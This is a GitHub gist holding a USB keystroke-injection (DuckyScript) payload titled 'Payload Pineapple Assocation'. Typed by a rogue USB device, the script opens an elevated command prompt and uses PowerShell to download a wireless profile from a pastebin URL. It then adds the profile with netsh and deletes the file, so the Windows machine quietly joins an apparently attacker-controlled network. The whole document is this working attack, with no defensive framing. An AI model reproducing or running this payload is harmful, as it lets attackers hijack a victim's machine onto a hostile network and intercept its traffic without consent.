Skip to content

Instantly share code, notes, and snippets.

Revisions

  1. JonnyBanana created this gist Apr 18, 2018.
    21 changes: 21 additions & 0 deletions Payload Pineapple Assocation (VERY FAST)
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,21 @@
    DEFAULT_DELAY 200
    DELAY 3000
    GUI r
    STRING cmd
    MENU
    STRING a
    ENTER
    LEFT
    ENTER
    STRING cd %TEMP%
    ENTER
    STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml')
    ENTER
    DELAY 1000
    ENTER
    STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection"
    ENTER
    STRING del a.xml
    ENTER
    STRING exit
    ENTER